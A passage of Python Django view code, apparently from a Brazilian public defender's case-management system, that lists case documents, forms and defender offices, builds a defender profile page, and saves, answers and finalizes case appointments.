'atendimento__defensor__parte__processo__vara__nome',\r\n 'atendimento__defensor__parte__processo__area__nome',\r\n )\r\n\r\n atendimentos = []\r\n for parte in atendimentos_processo:\r\n\r\n if not atendimentos or parte['atendimento__numero'] != atendimentos[-1]['numero']:\r\n\r\n processo_tipo = parte['atendimento__defensor__parte__processo__tipo']\r\n\r\n if processo_tipo:\r\n processo_tipo = Processo.LISTA_TIPO[processo_tipo][1]\r\n\r\n atendimentos.append({\r\n 'numero': parte['atendimento__numero'],\r\n 'processo': parte['atendimento__defensor__parte__processo__numero'],\r\n 'processo_parte': parte['atendimento__defensor__parte__parte'],\r\n 'processo_acao': parte['atendimento__defensor__parte__processo__acao__nome'],\r\n 'processo_vara': parte['atendimento__defensor__parte__processo__vara__nome'],\r\n 'processo_area': parte['atendimento__defensor__parte__processo__area__nome'],\r\n 'processo_tipo': processo_tipo,\r\n 'processo_data_cadastro': parte['atendimento__defensor__parte__data_cadastro'],\r\n 'requerente': None,\r\n 'requerido': None\r\n })\r\n\r\n if parte['atendimento__partes__tipo'] == 0:\r\n atendimentos[-1]['requerente'] = parte['atendimento__partes__pessoa__nome']\r\n else:\r\n atendimentos[-1]['requerido'] = parte['atendimento__partes__pessoa__nome']\r\n\r\n atendimentos_processo = atendimentos\r\n\r\n modo_exibicao = config.MODO_EXIBICAO_LISTA_DE_ATENDIMENTOS_DO_ASSISTIDO.lower()\r\n exibicao = modo_exibicao.replace(\" \", \"\").split(',')\r\n\r\n if request.GET.get('ligacao_numero'):\r\n url_agendamento_inicial = reverse('qualificacao_index', args=[request.GET.get('ligacao_numero')])\r\n else:\r\n url_agendamento_inicial = reverse('qualificacao_index')\r\n\r\n url_agendamento_inicial = '{}?next={}'.format(url_agendamento_inicial, request.session.get('next', ''))\r\n\r\n # if not atendimentos_como_requerente and \\\r\n # not atendimentos_como_requerido and \\\r\n # not atendimentos_processo and \\\r\n # not atendimentos_excluidos:\r\n # return redirect(url_agendamento_inicial)\r\n # else:\r\n angular = 
'AtendimentosPessoaCtrl'\r\n return render(request=request, template_name=\"atendimento/atendimentos.html\", context=locals())\r\n\r\n\r\n@login_required\r\ndef listar_comunidade(request, atendimento_numero):\r\n atendimento = AtendimentoDefensor.objects.get(numero=atendimento_numero)\r\n\r\n try:\r\n comunidade = Coletivo.objects.get(atendimento=atendimento.at_inicial).comunidade.to_dict()\r\n except ObjectDoesNotExist:\r\n comunidade = None\r\n\r\n return JsonResponse({'success': (comunidade is not None), 'comunidade': comunidade})\r\n\r\n\r\n@never_cache\r\n@login_required\r\ndef listar_documento(request, atendimento_numero=None):\r\n if atendimento_numero:\r\n\r\n atendimento = AtendimentoDefensor.objects.get(numero=atendimento_numero)\r\n\r\n partes = atendimento.processo_partes.values_list('id', flat=True)\r\n\r\n manifestacoes = Manifestacao.objects.ativos().select_related(\r\n 'parte__processo'\r\n ).prefetch_related(\r\n Prefetch(\r\n 'documentos',\r\n queryset=ManifestacaoDocumento.objects.ativos().filter(\r\n manifestacao__parte__in=partes\r\n )\r\n )\r\n ).filter(\r\n parte__in=partes\r\n ).order_by(\r\n '-situacao',\r\n '-respondido_em',\r\n )\r\n\r\n manifestacoes = [{\r\n 'id': manifestacao.id,\r\n 'situacao': manifestacao.situacao,\r\n 'respondido_em': manifestacao.respondido_em,\r\n 'processo': {\r\n 'numero': manifestacao.parte.processo.numero if not manifestacao.parte.processo.pre_cadastro else None\r\n },\r\n 'documentos': [{\r\n 'id': documento.id,\r\n 'origem': documento.origem,\r\n 'origem_id': documento.origem_id\r\n } for documento in manifestacao.documentos.ativos()]\r\n } for manifestacao in manifestacoes]\r\n\r\n # Identifica se o documento está vinculado à uma solicitação de Diligência\r\n subquery_diligencia = AtendimentoDefensor.objects.filter(\r\n Q(nucleo__diligencia=True) &\r\n Q(filhos__data_atendimento=None) &\r\n Q(filhos__ativo=True) &\r\n (\r\n (\r\n Q(documento__documento_online__isnull=False) &\r\n Q(documento__documento_online=OuterRef('documento_online_id'))\r\n ) |\r\n (\r\n Q(documento__documento_online__isnull=True) &\r\n Q(documento__arquivo=OuterRef('arquivo'))\r\n )\r\n )\r\n ).values('id')[:1]\r\n\r\n uploads = atendimento.documentos.select_related('pasta').filter(\r\n # documento_online=None\r\n origem_resposta=None\r\n ).annotate(\r\n pk=F('id'),\r\n documento_online_assunto=F('documento_online__assunto'),\r\n # titulo=F('documento_online__titulo'),\r\n documento_online_pk_uuid=F('documento_online__pk_uuid'),\r\n documento_online_versao=F('documento_online__versao_numero'),\r\n documento_online_criado_em=F('documento_online__criado_em'),\r\n documento_online_criado_por_nome_servidor=F('documento_online__criado_por__servidor__nome'),\r\n documento_online_modificado_em=F('documento_online__modificado_em'),\r\n documento_online_modificado_por_nome_servidor=F('documento_online__modificado_por__servidor__nome'),\r\n # TODO: renomear field data_assinado para \"assinado_em\" ou \"finalizado_em\"\r\n documento_online_assinado_em=F('documento_online__data_assinado'),\r\n # TODO: remover assinado por e incluir assinantes\r\n # documento_online_assinado_por_nome_servidor=F('documento_online__assinado_por__servidor__nome'),\r\n # documento_online_assinado_por_pk=F('documento_online__assinado_por__pk'),\r\n documento_online_esta_assinado=F('documento_online__esta_assinado'),\r\n cadastrado_por_nome=F('cadastrado_por__nome'),\r\n cadastrado_por_username=F('cadastrado_por__usuario__username'),\r\n enviado_por_nome=F('enviado_por__nome'),\r\n 
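# note: related fields are aliased with F() expressions here so the .values() call at the end can serialize them directly to JSON\r\n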
enviado_por_username=F('enviado_por__usuario__username'),\r\n pendente=Case(When(arquivo=\"\", documento_online=None, then=Value(True)), default=Value(False),\r\n output_field=BooleanField()),\r\n documento_resposta_nome=F('documento_resposta__nome'),\r\n documento_resposta_arquivo=F('documento_resposta__arquivo'),\r\n documento_resposta_data_enviado=F('documento_resposta__data_enviado'),\r\n documento_resposta_enviado_por_nome=F('documento_resposta__enviado_por__nome'),\r\n documento_resposta_enviado_por_username=F('documento_resposta__enviado_por__usuario__username'),\r\n pasta_nome=F(\"pasta__nome\"),\r\n pasta_descricao=F(\"pasta__descricao\"),\r\n diligencia=Exists(Subquery(subquery_diligencia, output_field=BooleanField()))\r\n ).order_by('-pendente', 'data_cadastro').values()\r\n\r\n for upload in uploads:\r\n\r\n if upload.get('arquivo'):\r\n documento_url = AtendimentoDocumento.objects.get(id=upload.get('pk')).arquivo.url\r\n # identifica tipo do arquivo\r\n filetype, encoding = mimetypes.guess_type(upload['arquivo'], strict=True)\r\n upload['filetype'] = filetype\r\n # completa URL do arquivo\r\n upload['arquivo'] = documento_url\r\n\r\n # Variável para controle se o documento ged pode ser baixado (padrão: False)\r\n upload['documento_online_pode_baixar'] = False\r\n upload['defensoria_nome'] = atendimento.defensoria.nome\r\n\r\n # Tratamentos para GED\r\n if upload['documento_online_id']:\r\n # Faz tratamento para habilitar os botões GED\r\n ged = DocumentoGED.objects.get(id=upload['documento_online_id'])\r\n\r\n pode_visualizar = SolarDefensoriaBackend().pode_visualizar(\r\n document=ged,\r\n usuario=request.user)\r\n upload['documento_online_pode_visualizar'] = pode_visualizar\r\n\r\n pode_editar = SolarDefensoriaBackend().pode_editar(\r\n document=ged,\r\n usuario=request.user)\r\n upload['documento_online_pode_editar'] = pode_editar[0]\r\n upload['documento_online_pode_editar_msg'] = pode_editar[1]\r\n\r\n pode_excluir = SolarDefensoriaBackend().pode_excluir_documento(\r\n document=ged,\r\n usuario=request.user)\r\n upload['documento_online_pode_excluir'] = pode_excluir[0]\r\n upload['documento_online_pode_excluir_msg'] = pode_excluir[1]\r\n\r\n pode_revogar_assinatura = SolarDefensoriaBackend().pode_revogar_assinatura(\r\n document=ged,\r\n usuario=request.user)\r\n upload['documento_online_pode_revogar_assinatura'] = pode_revogar_assinatura[0]\r\n upload['documento_online_pode_revogar_assinatura_msg'] = pode_revogar_assinatura[1]\r\n\r\n # Só pode baixar documento assinado ou com a configuração para baixar não assinados habilitada\r\n if upload['documento_online_esta_assinado'] or config.GED_PODE_BAIXAR_DOCUMENTO_NAO_ASSINADO:\r\n upload['documento_online_pode_baixar'] = True\r\n\r\n if upload['prazo_resposta']:\r\n upload['prazo_resposta_dias'] = (upload['prazo_resposta'].date() - date.today()).days\r\n if not upload['status_resposta'] is None:\r\n upload['status_resposta_str'] = AtendimentoDocumento.LISTA_STATUS_RESPOSTA[upload['status_resposta']][1]\r\n\r\n # completa URL do arquivo\r\n if upload['documento_resposta_arquivo']:\r\n upload['documento_resposta_arquivo'] = AtendimentoDocumento.objects.get(id=upload.get('documento_resposta_id')).arquivo.url # noqa: E501\r\n\r\n # Verifica em quais manifestações o documento está vinculado\r\n upload['manifestacoes'] = []\r\n for manifestacao in manifestacoes:\r\n for doc in manifestacao['documentos']:\r\n if doc['origem'] == ManifestacaoDocumento.ORIGEM_ATENDIMENTO and doc['origem_id'] == upload['pk']:\r\n 
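# an upload counts as linked when it is the origin of one of the manifestação attachments\r\n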
upload['manifestacoes'].append(manifestacao['id'])\r\n\r\n if len(upload['manifestacoes']) == 0:\r\n upload['manifestacoes'] = None\r\n\r\n upload['pasta'] = {\r\n \"id\": upload[\"pasta_id\"],\r\n \"nome\": upload[\"pasta_nome\"],\r\n \"descricao\": upload[\"pasta_descricao\"]\r\n }\r\n\r\n assistidos = AtendimentoPessoa.objects.filter(\r\n atendimento=atendimento.at_inicial,\r\n ativo=True,\r\n ).annotate(\r\n pessoa_nome=Case(\r\n When(pessoa__declara_identidade_genero=True, then=F('pessoa__nome_social')),\r\n default=F('pessoa__nome')\r\n ),\r\n ).values()\r\n\r\n assistidos_documentos = AtendimentoPessoa.objects.filter(\r\n pessoa__documentos__ativo=True,\r\n atendimento=atendimento.at_inicial,\r\n ativo=True,\r\n ).annotate(\r\n pk=F('pessoa__documentos__id'),\r\n arquivo=F('pessoa__documentos__arquivo'),\r\n documento_pk=F('pessoa__documentos__id'),\r\n nome=F('pessoa__documentos__nome'),\r\n data_enviado=F('pessoa__documentos__data_enviado'),\r\n enviado_por_nome=F('pessoa__documentos__enviado_por__nome'),\r\n enviado_por_username=F('pessoa__documentos__enviado_por__usuario__username'),\r\n ).values(\r\n 'pk',\r\n 'documento_pk',\r\n 'pessoa_id',\r\n 'arquivo',\r\n 'nome',\r\n 'data_enviado',\r\n 'enviado_por_nome',\r\n 'enviado_por_username'\r\n )\r\n\r\n for documento in assistidos_documentos:\r\n # completa URL do arquivo\r\n if documento.get('arquivo'):\r\n documento_url = DocumentoAssistido.objects.get(id=documento.get('documento_pk')).arquivo.url\r\n documento['arquivo'] = documento_url\r\n documento['pendente'] = False\r\n\r\n # Verifica em quais manifestações o documento está vinculado\r\n documento['manifestacoes'] = []\r\n for manifestacao in manifestacoes:\r\n for doc in manifestacao['documentos']:\r\n if doc['origem'] == ManifestacaoDocumento.ORIGEM_PESSOA and doc['origem_id'] == documento['pk']:\r\n documento['manifestacoes'].append(manifestacao['id'])\r\n\r\n if len(documento['manifestacoes']) == 0:\r\n documento['manifestacoes'] = None\r\n\r\n atendimento_url = reverse('atendimento_atender', args=[atendimento_numero, ])\r\n\r\n return JsonResponse({\r\n 'uploads': list(uploads),\r\n 'assistidos': list(assistidos),\r\n 'assistidos_documentos': list(assistidos_documentos),\r\n 'atendimento_url': atendimento_url,\r\n 'atendimento_numero': atendimento_numero,\r\n 'manifestacoes': manifestacoes\r\n }, safe=False)\r\n\r\n else:\r\n\r\n arr = []\r\n for i in Documento.objects.all():\r\n arr.append(i.nome)\r\n\r\n return JsonResponse(arr, safe=False)\r\n\r\n\r\n@login_required\r\ndef listar_formulario(request, atendimento_numero):\r\n\r\n formularios = []\r\n\r\n try:\r\n atendimento = AtendimentoDefensor.objects.get(numero=atendimento_numero)\r\n except ObjectDoesNotExist:\r\n return JsonResponse({'success': False, 'formularios': formularios})\r\n\r\n if atendimento.nucleo:\r\n nucleo = atendimento.nucleo\r\n elif atendimento.defensoria and atendimento.defensoria.nucleo:\r\n nucleo = atendimento.defensoria.nucleo\r\n else:\r\n nucleo = None\r\n\r\n formularios_lst = FormularioNucleo.objects.ativos().filter(\r\n Q(exibir_em_atendimento=True) &\r\n (\r\n Q(nucleo_id=nucleo) |\r\n Q(publico=True)\r\n )\r\n )\r\n\r\n for formulario in formularios_lst:\r\n\r\n item = {\r\n 'id': formulario.id,\r\n 'texto': formulario.texto,\r\n 'perguntas': []\r\n }\r\n\r\n for pergunta in formulario.perguntas:\r\n item['perguntas'].append({\r\n 'id': pergunta.id,\r\n 'texto': pergunta.texto,\r\n 'tipo': pergunta.tipo,\r\n 'alternativas': pergunta.alternativas,\r\n 'resposta': None\r\n 
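# 'resposta' starts as None and is filled in below from the RespostaNucleo records of this atendimento\r\n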
})\r\n\r\n respostas = RespostaNucleo.objects.filter(\r\n atendimento=atendimento.at_inicial,\r\n pergunta__formulario=formulario\r\n )\r\n\r\n for resposta in respostas:\r\n for pergunta in item['perguntas']:\r\n if pergunta['id'] == resposta.pergunta_id:\r\n pergunta['resposta'] = resposta.texto\r\n\r\n formularios.append(item)\r\n\r\n return JsonResponse({'success': True, 'formularios': formularios})\r\n\r\n\r\n@never_cache\r\n@login_required\r\ndef listar_defensorias(request, atendimento_numero=None):\r\n\r\n atendimento = AtendimentoDefensor.objects.get(numero=atendimento_numero)\r\n\r\n # Recupera todos atendimentos vinculados ao inicial\r\n atendimentos = AtendimentoDefensor.objects.filter(\r\n Q(inicial=atendimento.at_inicial.id) &\r\n Q(tipo__in=[\r\n Atendimento.TIPO_INICIAL,\r\n Atendimento.TIPO_RETORNO,\r\n Atendimento.TIPO_NUCLEO,\r\n Atendimento.TIPO_VISITA,\r\n Atendimento.TIPO_ENCAMINHAMENTO,\r\n Atendimento.TIPO_ANOTACAO\r\n ]) &\r\n Q(remarcado=None) &\r\n Q(ativo=True)\r\n ).values_list('id', flat=True)\r\n\r\n # Gera lista dos ids dos atendimentos (inicial + retornos)\r\n atendimentos = [atendimento.at_inicial.id] + list(atendimentos)\r\n\r\n # Recupera lista de defensorias dos atendimentos\r\n defensorias_atendimentos = AtendimentoDefensor.objects.filter(\r\n id__in=atendimentos\r\n ).order_by('defensoria_id').distinct().values_list('defensoria_id', flat=True)\r\n\r\n # Recupera lista de defensorias das partes de processos\r\n defensorias_processos = ParteProcesso.objects.filter(\r\n atendimento__in=atendimentos\r\n ).order_by('defensoria_id').distinct().values_list('defensoria_id', flat=True)\r\n\r\n # Unifica lista de defensorias participantes (via atendimentos ou processos)\r\n defensorias_participantes = set(list(defensorias_atendimentos) + list(defensorias_processos))\r\n\r\n # Recupera dados das defensorias participantes ou que podem vincular tarefa de cooperacao\r\n defensorias = list(Defensoria.objects.filter(\r\n Q(id__in=defensorias_participantes) |\r\n Q(pode_vincular_tarefa_de_cooperacao=True)\r\n ).values(\r\n 'id',\r\n 'nome',\r\n 'atuacao',\r\n 'nucleo__multidisciplinar',\r\n 'nucleo__diligencia',\r\n 'nucleo__indeferimento',\r\n 'nucleo__agendamento',\r\n ))\r\n\r\n # Marca quais das defensorias participam do atendimento/processo\r\n for defensoria in defensorias:\r\n\r\n if defensoria['id'] in defensorias_participantes:\r\n defensoria['participante'] = True\r\n else:\r\n defensoria['participante'] = False\r\n\r\n # Só permite o cadastro de tarefas para setores com acesso ao Painel do Defensor (ver nucleo.views.index)\r\n defensoria['pode_cadastrar_tarefa'] = True\r\n nucleo_multidisciplinar = defensoria.pop('nucleo__multidisciplinar')\r\n nucleo_diligencia = defensoria.pop('nucleo__diligencia')\r\n nucleo_indeferimento = defensoria.pop('nucleo__indeferimento')\r\n nucleo_agendamento = defensoria.pop('nucleo__agendamento')\r\n\r\n if nucleo_multidisciplinar:\r\n defensoria['pode_cadastrar_tarefa'] = False\r\n elif nucleo_diligencia:\r\n defensoria['pode_cadastrar_tarefa'] = False\r\n elif nucleo_indeferimento and not nucleo_agendamento:\r\n defensoria['pode_cadastrar_tarefa'] = False\r\n\r\n data_base = datetime.today()\r\n\r\n resposta_para = []\r\n\r\n if hasattr(request.user.servidor, 'defensor'):\r\n defensor = request.user.servidor.defensor\r\n\r\n atuacoes = Atuacao.objects.vigentes_por_defensor(\r\n defensor=defensor,\r\n inicio=data_base\r\n ).values(\r\n 'defensoria_id',\r\n 'defensoria__nome',\r\n 'defensoria__nucleo__multidisciplinar',\r\n 
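# the nucleo flags requested below feed the pode_cadastrar_tarefa rules applied in the loop further down\r\n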
'defensoria__nucleo__diligencia',\r\n 'defensoria__nucleo__indeferimento',\r\n 'defensoria__nucleo__agendamento',\r\n )\r\n\r\n for atuacao in atuacoes:\r\n\r\n # Só permite o cadastro de tarefas para setores com acesso ao Painel do Defensor (ver nucleo.views.index)\r\n pode_cadastrar_tarefa = True\r\n nucleo_multidisciplinar = atuacao.pop('defensoria__nucleo__multidisciplinar')\r\n nucleo_diligencia = atuacao.pop('defensoria__nucleo__diligencia')\r\n nucleo_indeferimento = atuacao.pop('defensoria__nucleo__indeferimento')\r\n nucleo_agendamento = atuacao.pop('defensoria__nucleo__agendamento')\r\n\r\n if nucleo_multidisciplinar:\r\n pode_cadastrar_tarefa = False\r\n elif nucleo_diligencia:\r\n pode_cadastrar_tarefa = False\r\n elif nucleo_indeferimento and not nucleo_agendamento:\r\n pode_cadastrar_tarefa = False\r\n\r\n resposta_para.append({\r\n 'id': atuacao['defensoria_id'],\r\n 'nome': atuacao['defensoria__nome'],\r\n 'pode_cadastrar_tarefa': pode_cadastrar_tarefa,\r\n })\r\n\r\n return JsonResponse({\r\n 'defensorias': defensorias,\r\n 'resposta_para': resposta_para\r\n })\r\n\r\n\r\n@never_cache\r\n@login_required\r\ndef listar_tipos_tarefas(request, atendimento_numero=None):\r\n from atendimento.atendimento.models import Qualificacao\r\n tipos_tarefas = list(Qualificacao.objects.filter(tipo=40).values('id', 'titulo'))\r\n return JsonResponse({\r\n 'tipos_tarefas': tipos_tarefas\r\n })\r\n\r\n\r\n@login_required\r\ndef perfil(request, comarca_id=None):\r\n if hasattr(request.user.servidor, 'defensor'):\r\n data_base = datetime.now()\r\n servidor = request.user.servidor\r\n defensor = request.user.servidor.defensor\r\n\r\n AtuacaoClass = Atuacao\r\n atuacoes_lst = defensor.atuacoes().filter(\r\n defensoria__evento=None\r\n )\r\n\r\n atuacoes_ativas = atuacoes_lst.vigentes()\r\n\r\n atuacoes_futuras = atuacoes_lst.filter(\r\n Q(data_inicial__gt=data_base)\r\n )\r\n\r\n comarcas = atuacoes_ativas.filter(\r\n defensoria__nucleo=None\r\n ).distinct(\r\n 'defensoria__comarca_id',\r\n 'defensoria__comarca__nome'\r\n ).order_by(\r\n 'defensoria__comarca__nome'\r\n ).values_list(\r\n 'defensoria__comarca_id',\r\n 'defensoria__comarca__nome'\r\n )\r\n\r\n nucleos = Atuacao.objects.filter(\r\n Q(defensor=defensor) &\r\n ~Q(defensoria__nucleo=None) &\r\n (\r\n (\r\n (\r\n Q(data_inicial__lte=data_base) &\r\n Q(data_final=None)\r\n ) |\r\n (\r\n Q(data_inicial__lte=data_base) &\r\n Q(data_final__gte=data_base)\r\n )\r\n ) |\r\n (\r\n Q(defensoria__evento__participantes=servidor) &\r\n Q(defensoria__evento__data_inicial__lte=datetime.now()) &\r\n Q(defensoria__evento__data_final__gte=datetime.now() - timedelta(days=5)) &\r\n Q(defensoria__evento__ativo=True)\r\n )\r\n )\r\n ).distinct(\r\n 'defensoria__nucleo_id',\r\n 'defensoria__nucleo__nome',\r\n 'defensoria__nucleo__plantao'\r\n ).order_by(\r\n 'defensoria__nucleo__nome'\r\n ).values_list(\r\n 'defensoria__nucleo_id',\r\n 'defensoria__nucleo__nome',\r\n 'defensoria__nucleo__plantao',\r\n 'defensoria__nucleo__diligencia',\r\n )\r\n\r\n # Verifica se usuário está lotado em alguma defensoria com o recurso peticionamento habilitado\r\n pode_cadastrar_peticionamento = atuacoes_ativas.filter(\r\n defensoria__pode_cadastrar_peticionamento=True\r\n ).exists()\r\n\r\n total_peticionamentos = Manifestacao.objects.ativos().filter(\r\n situacao__in=[Manifestacao.SITUACAO_ANALISE, Manifestacao.SITUACAO_ERRO],\r\n defensoria__in=atuacoes_ativas.values('defensoria')\r\n ).count()\r\n\r\n total_avisos = 0\r\n\r\n # Se pode cadastrar peticionamentos e procapi está ativo, permite visualizar avisos\r\n if pode_cadastrar_peticionamento and config.ATIVAR_PROCAPI:\r\n\r\n # Só consulta se credenciais foram identificadas ou é um superusuário\r\n if defensor.eh_defensor or request.user.is_superuser:\r\n # Consulta no ProcAPI o total de avisos pendentes\r\n api = APIAviso()\r\n total_avisos = api.consultar_total_abertos(params={\r\n 'distribuido_cpf': defensor.servidor.cpf if not request.user.is_superuser else None,\r\n 'ativo': True\r\n })\r\n\r\n # Se pode visualizar processos e procapi está ativo, permite visualizar avisos\r\n if request.user.has_perm('processo.view_distribuicao') and config.ATIVAR_PROCAPI:\r\n\r\n total_processos_para_distribuir = 0\r\n\r\n api = APIAviso()\r\n # Consulta no ProcAPI a lista de avisos pendentes\r\n total_processos_para_distribuir = api.consultar_total(params={\r\n 'distribuido': False,\r\n 'ativo': True,\r\n })\r\n\r\n request.session['nucleo'] = None\r\n request.session['comarca'] = servidor.comarca.id\r\n\r\n return render(request=request, template_name=\"atendimento/perfil.html\", context=locals())\r\n\r\n\r\n@login_required\r\ndef responder_nucleo(request, atendimento_numero):\r\n pass\r\n\r\n\r\n@login_required\r\ndef responder_tarefa(request, atendimento_numero):\r\n if request.method == 'POST':\r\n\r\n servidor = Servidor.objects.get(usuario_id=request.user.id)\r\n tarefa = Tarefa.objects.get(id=request.POST.get('tarefa'))\r\n documento = None\r\n\r\n if request.FILES:\r\n\r\n salvou, documento = salvar_documento_pre(request, atendimento_numero)\r\n\r\n if not salvou:\r\n for k, v in documento.items():\r\n messages.error(request, '{0}: {1}'.format(k, v))\r\n return redirect(request.POST['next'])\r\n\r\n resposta = tarefa.responder(request.POST.get('resposta'), servidor, int(request.POST.get('status')))\r\n\r\n if documento:\r\n resposta.documento = documento\r\n resposta.save()\r\n\r\n if request.POST.get('documento_ged'):\r\n resposta.documentos.add(request.POST.get('documento_ged'))\r\n\r\n if tarefa.status != resposta.status:\r\n tarefa.status = resposta.status\r\n tarefa.save()\r\n\r\n messages.success(request, 'Resposta à tarefa registrada com sucesso!')\r\n\r\n return redirect(request.POST['next'])\r\n\r\n raise Http404\r\n\r\n\r\n@login_required\r\n@transaction.atomic\r\ndef salvar(request, atendimento_numero):\r\n \"\"\"Utilizado para salvar o atendimento na página Ficha de Atendimento Histórico\"\"\"\r\n\r\n success = False\r\n errors = None\r\n recarregar_pagina = False\r\n\r\n if request.method == 'POST':\r\n\r\n atendimento = AtendimentoDefensor.objects.filter(numero=atendimento_numero, ativo=True, remarcado=None).first()\r\n\r\n if (atendimento and\r\n (not atendimento.realizado or\r\n atendimento.agendado_hoje or\r\n atendimento.realizado_hoje or\r\n atendimento.pode_atender_retroativo(request.user))):\r\n\r\n data_atendimento_original = atendimento.data_atendimento\r\n form = AtendimentoDefensorForm(request.POST, instance=atendimento)\r\n\r\n if form.is_valid():\r\n\r\n atendimento = form.save(commit=False)\r\n atendimento.modificado_por = request.user.servidor\r\n\r\n servidor = request.user.servidor\r\n defensor = servidor.defensor\r\n\r\n if not atendimento.atendido_por:\r\n atendimento.atendido_por = servidor\r\n\r\n # Corrige vínculo do defensor com o atendimento\r\n if defensor.eh_defensor and defensor not in [atendimento.defensor, atendimento.substituto]:\r\n\r\n atuacao = defensor.all_atuacoes.vigentes(\r\n ajustar_horario=False\r\n ).filter(\r\n defensoria=atendimento.defensoria\r\n
).first()\r\n\r\n if atuacao is None:\r\n logger.warning('O defensor {} não está lotado na defensoria {}'.format(defensor, atendimento.defensoria)) # noqa: E501\r\n elif atuacao.tipo == Atuacao.TIPO_SUBSTITUICAO:\r\n atendimento.defensor = atuacao.titular\r\n atendimento.substituto = atuacao.defensor\r\n elif atuacao:\r\n atendimento.defensor = atuacao.defensor\r\n\r\n if atendimento.data_atendimento.date() == date.today():\r\n if data_atendimento_original:\r\n atendimento.data_atendimento = data_atendimento_original\r\n else:\r\n atendimento.data_atendimento = datetime.now()\r\n\r\n if request.POST.get('finalizado'):\r\n atendimento.finalizado_por = Defensor.objects.get(servidor__usuario=request.user)\r\n atendimento.data_finalizado = datetime.now()\r\n\r\n if request.POST.get('forma_atendimento'):\r\n atendimento.forma_atendimento_id = request.POST.get('forma_atendimento')\r\n else:\r\n atendimento.forma_atendimento_id = None\r\n\r\n if request.POST.get('tipo_coletividade'):\r\n atendimento.tipo_coletividade_id = request.POST.get('tipo_coletividade')\r\n else:\r\n atendimento.tipo_coletividade_id = None\r\n\r\n if request.POST.get('interesse_conciliacao'):\r\n atendimento.interesse_conciliacao = request.POST.get('interesse_conciliacao')\r\n else:\r\n atendimento.interesse_conciliacao = None\r\n\r\n if request.POST.get('justificativa_nao_interesse'):\r\n atendimento.justificativa_nao_interesse = request.POST.get('justificativa_nao_interesse')\r\n else:\r\n atendimento.justificativa_nao_interesse = None\r\n\r\n if request.POST.get('tipo'):\r\n atendimento.nucleo = Nucleo.objects.filter(acordo=True).first()\r\n\r\n if AtendimentoPreso.objects.filter(id=atendimento.id).exists():\r\n nadep = AtendimentoPreso.objects.get(id=atendimento.id)\r\n nadep.__dict__.update(atendimento.__dict__)\r\n atendimento = nadep\r\n\r\n atualiza_tarefa_atendimento_origem(\r\n atendimento=atendimento,\r\n resposta=atendimento.historico,\r\n servidor=servidor,\r\n finalizar=True,\r\n reabrir=False\r\n )\r\n\r\n salvar_acordo_para_atendimento(request, atendimento)\r\n\r\n atendimento.save()\r\n\r\n # Muda status publico/privado do atendimento\r\n if request.POST.get('publico'):\r\n if request.POST.get('publico') == 'true':\r\n Acesso.conceder_publico(atendimento, request.user.servidor.defensor)\r\n else:\r\n Acesso.revogar_publico(atendimento, request.user.servidor.defensor)\r\n\r\n # Salvar indeferimento por negação para cada pessoa marcada\r\n if request.POST.get('indeferimento_classe'):\r\n\r\n success = True\r\n\r\n # recarregar página ao Salvar o Indeferimento\r\n if request.POST.getlist('indeferimento_pessoa'):\r\n recarregar_pagina = True\r\n\r\n for pessoa in request.POST.getlist('indeferimento_pessoa'):\r\n try:\r\n Indeferimento.objects.get_or_create_atendimento_pessoa(\r\n atendimento=atendimento,\r\n atuacao_id=None,\r\n pessoa_id=pessoa,\r\n classe_id=request.POST.get('indeferimento_classe'),\r\n setor_encaminhado_id=request.POST.get('indeferimento_setor_encaminhado'),\r\n )\r\n except Exception as e:\r\n errors = {\r\n 'field': 'Indeferimento',\r\n 'message': str(e)\r\n }\r\n success = False\r\n recarregar_pagina = False\r\n break\r\n else:\r\n success = True\r\n else:\r\n success = True\r\n\r\n else:\r\n\r\n errors = [({'field': k, 'message': v[0]}) for k, v in form.errors.items()]\r\n\r\n return JsonResponse({\r\n 'success': success,\r\n 'errors': errors,\r\n 'recarregar_pagina': recarregar_pagina\r\n })\r\n\r\n\r\ndef salvar_acordo_para_atendimento(request, atendimento):\r\n\r\n if 
request.POST.get('acordo') and (atendimento.nucleo or atendimento.defensoria.nucleo):\r\n\r\n acordo, novo = Acordo.objects.update_or_create(\r\n atendimento=atendimento,\r\n defaults={\r\n 'tipo': int(request.POST.get('acordo')),\r\n 'ativo': True\r\n }\r\n )\r\n\r\n if request.FILES:\r\n\r\n if acordo.termo:\r\n documento = acordo.termo\r\n else:\r\n documento = AtendimentoDocumento(\r\n atendimento=atendimento.at_inicial,\r\n cadastrado_por=request.user.servidor)\r\n\r\n documento.data_enviado = datetime.now()\r\n documento.enviado_por = request.user.servidor\r\n\r\n form = DocumentoForm(request.POST, request.FILES, instance=documento)\r\n\r\n if form.is_valid():\r\n acordo.termo = form.save()\r\n acordo.save()\r\n\r\n # Remove dados de atendimento se ambas as partes não compareceram\r\n if acordo.tipo == Acordo.TIPO_AMBOS and not config.CONTABILIZAR_ACORDO_TIPO_AMBOS:\r\n atendimento.atendido_por = None\r\n atendimento.data_atendimento = None\r\n\r\n else:\r\n\r\n if hasattr(atendimento, 'acordo'):\r\n atendimento.acordo.ativo = False\r\n atendimento.acordo.save()\r\n\r\n\r\n@login_required\r\ndef finalizar(request, atendimento_numero):\r\n atendimento = AtendimentoDefensor.objects.filter(numero=atendimento_numero, ativo=True, remarcado=None).first()\r\n data_atendimento_original = atendimento.data_atendimento\r\n\r\n if atendimento.data_atendimento:\r\n if atendimento.data_atendimento.date() == date.today():\r\n if data_atendimento_original:\r\n atendimento.data_atendimento = data_atendimento_original\r\n else:\r\n atendimento.data_atendimento = datetime.now()\r\n else:\r\n atendimento.data_atendimento = datetime.now()\r\n\r\n atendimento.save()\r\n\r\n messages.success(request, 'Atendimento finalizado com sucesso!')\r\n return redirect('atendimento_index')\r\n\r\n\r\nclass AnotacaoCreateView(CreateView):\r\n form_class = AnotacaoForm\r\n model = AtendimentoDefensor\r\n template_name = \"atendimento/atender_modal_anotacao_form.html\"\r\n\r\n # variáveis para uso em heranças\r\n atendimento = None\r\n atendimento_tipo = Atendimento.TIPO_ANOTACAO\r\n\r\n def get_context_data(self, **kwargs):\r\n\r\n context = super(AnotacaoCreateView, self).get_context_data(**kwargs)\r\n context['form_name'] = 'AnotacaoForm'\r\n\r\n # carrega dados do atendimento em que a anotação será vinculada\r\n if self.kwargs['atendimento_numero']:\r\n self.atendimento = AtendimentoDefensor.objects.get(\r\n numero=self.kwargs['atendimento_numero'],\r\n ativo=True\r\n )\r\n context['atendimento'] = self.atendimento\r\n\r\n return context\r\n\r\n def form_invalid(self, form):\r\n\r\n mensagem = \"Erro ao salvar! Por favor, tente novamente.\"\r\n\r\n if self.request.is_ajax():\r\n return JsonResponse({'success': False, 'message': mensagem, 'errors': form.errors})\r\n else:\r\n messages.error(self.request, mensagem)\r\n 